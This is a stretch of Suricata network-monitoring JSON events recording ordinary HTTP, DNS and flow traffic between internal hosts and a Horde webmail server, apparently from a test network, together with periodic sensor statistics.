{"timestamp":"2020-02-29T00:00:18.119305+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} {"timestamp":"2020-02-29T00:00:19.000671+0000","flow_id":1343567395055843,"event_type":"flow","src_ip":"192.168.10.130","src_port":34674,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1164,"bytes_toclient":643,"start":"2020-02-28T23:59:12.944355+0000","end":"2020-02-28T23:59:18.097765+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:21.000249+0000","event_type":"stats","stats":{"uptime":13673,"capture":{"kernel_packets":131776,"kernel_drops":0},"decoder":{"pkts":131789,"bytes":91594733,"invalid":175,"ipv4":130374,"ipv6":8,"ethernet":131789,"raw":0,"null":0,"sll":0,"tcp":125441,"udp":4744,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2647,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2663,"synack":2654,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1695,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2161,"failed_udp":106},"tx":{"http":4375,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2237}},"flow_mgr":{"closed_pruned":2615,"new_pruned":15,"est_pruned":2210,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":6,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":75516,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:21.001336+0000","flow_id":481520212261976,"event_type":"flow","src_ip":"192.168.10.130","src_port":34670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":11,"bytes_toserver":2135,"bytes_toclient":6655,"start":"2020-02-28T23:58:44.932952+0000","end":"2020-02-28T23:59:20.376358+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:21.747956+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:00:23.124284+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52628,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":1}} {"timestamp":"2020-02-29T00:00:24.004707+0000","flow_id":682082286951048,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"159.203.8.72","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-28T23:55:23.449160+0000","end":"2020-02-28T23:55:23.561958+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:25.000767+0000","flow_id":1255138313859760,"event_type":"flow","src_ip":"192.168.10.130","src_port":34676,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1894,"bytes_toclient":6334,"start":"2020-02-28T23:59:19.094896+0000","end":"2020-02-28T23:59:24.514097+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:28.000202+0000","event_type":"stats","stats":{"uptime":13680,"capture":{"kernel_packets":131791,"kernel_drops":0},"decoder":{"pkts":131794,"bytes":91595063,"invalid":175,"ipv4":130379,"ipv6":8,"ethernet":131794,"raw":0,"null":0,"sll":0,"tcp":125446,"udp":4744,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2647,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2663,"synack":2654,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1695,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2161,"failed_udp":106},"tx":{"http":4375,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2237}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2211,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":23758,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:31.230446+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29261,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:31.336274+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51758,"proto":"UDP","dns":{"type":"answer","id":29261,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:31.336274+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51758,"proto":"UDP","dns":{"type":"answer","id":29261,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:31.463043+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:00:31.478809+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414}} {"timestamp":"2020-02-29T00:00:34.000269+0000","flow_id":153157065063796,"event_type":"flow","src_ip":"192.168.10.122","src_port":45902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:33.474484+0000","end":"2020-02-28T23:55:33.585976+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:35.000227+0000","event_type":"stats","stats":{"uptime":13687,"capture":{"kernel_packets":131794,"kernel_drops":0},"decoder":{"pkts":131808,"bytes":91602696,"invalid":175,"ipv4":130393,"ipv6":8,"ethernet":131808,"raw":0,"null":0,"sll":0,"tcp":125458,"udp":4746,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2648,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2664,"synack":2655,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1696,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2162,"failed_udp":106},"tx":{"http":4376,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2238
}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2211,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19177,"memcap_state":0,"memcap_global":0},"http":{"memuse":79802,"memcap":0}}} {"timestamp":"2020-02-29T00:00:36.479921+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52634,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:37.879535+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43094,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4163,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:37.984947+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43094,"proto":"UDP","dns":{"type":"answer","id":4163,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:37.984947+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43094,"proto":"UDP","dns":{"type":"answer","id":4163,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:00:38.081444+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:00:38.092418+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414}} {"timestamp":"2020-02-29T00:00:41.000850+0000","flow_id":812859747239381,"event_type":"flow","src_ip":"192.168.10.122","src_port":57389,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:40.689621+0000","end":"2020-02-28T23:55:40.802671+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:00:42.000177+0000","event_type":"stats","stats":{"uptime":13694,"capture":{"kernel_packets":131820,"kernel_drops":0},"decoder":{"pkts":131829,"bytes":91610721,"invalid":175,"ipv4":130412,"ipv6":8,"ethernet":131829,"raw":0,"null":0,"sll":0,"tcp":125475,"udp":4748,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2649,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2665,"synack":2656,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1697,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2163,"failed_udp":106},"tx":{"http":4377,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2239}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2212,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19176,"memcap_state":0,"memcap_global":0},"http":{"memuse":79860,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:42.001673+0000","flow_id":973732042355293,"event_type":"flow","src_ip":"192.168.10.122","src_port":51531,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:41.176733+0000","end":"2020-02-28T23:55:41.284558+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:42.391403+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53380,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59919,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:42.497019+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53380,"proto":"UDP","dns":{"type":"answer","id":59919,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:42.497019+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53380,"proto":"UDP","dns":{"type":"answer","id":59919,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:42.592216+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5734}} 
{"timestamp":"2020-02-29T00:00:43.093621+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52636,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:44.604989+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59941,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31014,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:44.710471+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59941,"proto":"UDP","dns":{"type":"answer","id":31014,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:44.710471+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59941,"proto":"UDP","dns":{"type":"answer","id":31014,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:44.908834+0000","flow_id":985912589424072,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:00:44.913706+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44624,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:45.019117+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44196,"proto":"UDP","dns":{"type":"answer","id":44624,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:45.019117+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44196,"proto":"UDP","dns":{"type":"answer","id":44624,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:45.980555+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5734},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":21109,"tx_id":0}} 
{"timestamp":"2020-02-29T00:00:45.989956+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31059,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:46.000124+0000","flow_id":2034129418565450,"event_type":"flow","src_ip":"192.168.10.81","src_port":52608,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":751,"bytes_toclient":952,"start":"2020-02-28T23:59:39.898890+0000","end":"2020-02-28T23:59:44.908679+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000341+0000","flow_id":1917856063927441,"event_type":"flow","src_ip":"192.168.10.81","src_port":52606,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":6,"bytes_toserver":747,"bytes_toclient":1857,"start":"2020-02-28T23:59:39.898193+0000","end":"2020-02-28T23:59:44.910626+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:46.000416+0000","flow_id":376508265507704,"event_type":"flow","src_ip":"192.168.10.81","src_port":52600,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":742,"bytes_toclient":798,"start":"2020-02-28T23:59:39.895864+0000","end":"2020-02-28T23:59:44.911116+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000484+0000","flow_id":106410657166283,"event_type":"flow","src_ip":"192.168.10.81","src_port":52604,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1839,"bytes_toclient":7040,"start":"2020-02-28T23:59:39.897995+0000","end":"2020-02-28T23:59:44.919065+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000556+0000","flow_id":2223004900341093,"event_type":"flow","src_ip":"192.168.10.81","src_port":52598,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":14,"bytes_toserver":1744,"bytes_toclient":13124,"start":"2020-02-28T23:59:39.734565+0000","end":"2020-02-28T23:59:44.918735+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
